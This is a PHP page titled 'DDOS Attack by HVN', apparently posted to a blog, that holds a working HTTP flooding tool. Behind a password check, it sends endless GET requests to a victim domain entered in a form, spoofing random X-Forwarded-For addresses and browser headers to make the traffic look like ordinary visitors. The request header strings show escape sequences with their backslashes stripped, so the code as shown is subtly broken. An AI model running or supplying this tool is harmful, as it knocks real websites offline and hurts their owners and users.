<?php
$dominio = $_POST['host'];
$ruta = $_POST['path'];
$port = $_POST['port'];
$poder = $_POST['poder'];
$pw = $_POST['pw'];
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="msvalidate.01" content="ECAB4AE09BDECAEDA633439FD8D12D38" />
<meta name="author" content="Punker2Bot" />
<title>DDOS Attack by HVN™</title>
<style>
body { padding: 3px; }
* {
background-color: #1F1F1F;
color: #0EEF57;
font-family: calibri,tahoma,verdana,terminal,serif,lucida,system;
font-size: 18px;
margin: 0; }
input {
width: 440px;
border: solid 1px #00BCFF;
padding: 2px; }
input.accion {
width: 215px;
border: solid 2px #00BCFF;
padding: 3px;
cursor: pointer }
input:hover , input:active { border-color: #FFE900 }
#dinamico {
padding: 3px;
font-size: 13px!important;
height: 300px;
min-height: 300px;
max-height: 300px;
overflow: hidden }
</style>
<script type="text/javascript">
function ir_a_bajo(){
var scc = document.getElementById('dinamico');
scc.scrollTop = scc.scrollHeight + scc.offsetHeight;
}
setInterval('ir_a_bajo()',75);
</script>
</head>
<body id="index">
<form action="" method="post" name="jaja">
<table>
<tr>
<td class="titulo">
Domain</td> <td><input id="boton" type="text" name="host" value="<?php if($dominio=="") { print 'www.victima.com'; } else { print htmlentities($dominio); } ?>" size="40px" ></td>
</tr>
<tr>
<td class="titulo">
Path </td> <td> <input id="boton" type="text" name="path" value="<?php if($ruta=="") { print '/index.php'; } else { print htmlentities($ruta); } ?>" size="40px" /> </td>
</tr>
<tr>
<td class="titulo">
Cổng </td>
<td><input id="boton" type="text" disabled name="port" value="<?php if($port=="") { print '80 (disabled)'; } else { print htmlentities($port); } ?>" size="40px" /> </td>
</tr>
<tr>
<td class="titulo">
Mật khẩu </td>
<td><input id="boton" type="text" name="pw" value="<?php if($pw=="") { print 'Password'; } else { print htmlentities($pw); } ?>" size="40px" /> </td>
</tr>
<tr>
<td>Bạn đã sẵn sàng chưa?</td>
<td><input type="submit" value="DDOS ngay bây giờ!" class="accion"></td>
</tr>
</table>
</form>
<br />
<div id="dinamico">
<?php
@set_time_limit(0);
$msj = array("<h2>Bạn không thể tiếp tục vì nhập sai mật khẩu</h2></div></body></html>","<h2>Hãy điền đúng thông tin về victim trước đã!</h2></div></body></html>","<big><b>Không thể tấn công!!!</b></big><br />n","0a32e26a417d2c7cfbd33","2e2234a41122a233cfbd333b9bc30a03");
function ddoser($dominio,$ruta) {
//hago un random de ips para no ser siempre el mismo vistitante
$ip_simulada = rand(188,254).'.'.rand(1,254).'.'.rand(1,254).'.'.rand(1,254);
//defino y abro socket segun los datos del form
$socket = fsockopen($dominio, "80", $errno, $errstr, 30);
// comienzan los datos del header para parecer una persona comun xD
$header = "GET ".$ruta." HTTP/1.1rn";
$header .= "Host: ".$dominio."rn";
$header .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16rn";
$header .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpg,image/gif,*/*;q=0.5rn";
$header .= "Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3rn";
$header .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn";
$header .= "Keep-Alive: 300rn";
$header .= "*****-Connection: keep-alivern";
$header .= "Referer: http://".$dominio.$ruta."rn";
$header .= "Content-Type: application/x-www-form-urlencodedrn";
$header .= "X-Forwarded-For: ".$ip_simulada."rn";
$header .= "Via: CB-Prxrn";
$header .= "Connection: Closernrn";
//envio todo lo recolectado
$send_header = fwrite($socket,$header);
//lo muestro en la web
if($send_header) {
print("Attacking as: <span style='color:#FF0F2F'>".$ip_simulada."</span> @ ".htmlentities(str_replace('www.','',$dominio))."".htmlentities($ruta)."<br />n");
} else {
print("$msj[2]");
}fclose($socket);
}
if($msj[3] !== (md5(md5($pw)))) { die ("$msj[0]");}
if($dominio !== "" && $dominio !== "www.victima.com") {
while(1) {
ddoser($dominio,$ruta);
}
} else { die ("$msj[1]");}
?>
</div>
</body>
</html>
No comments:
Post a Comment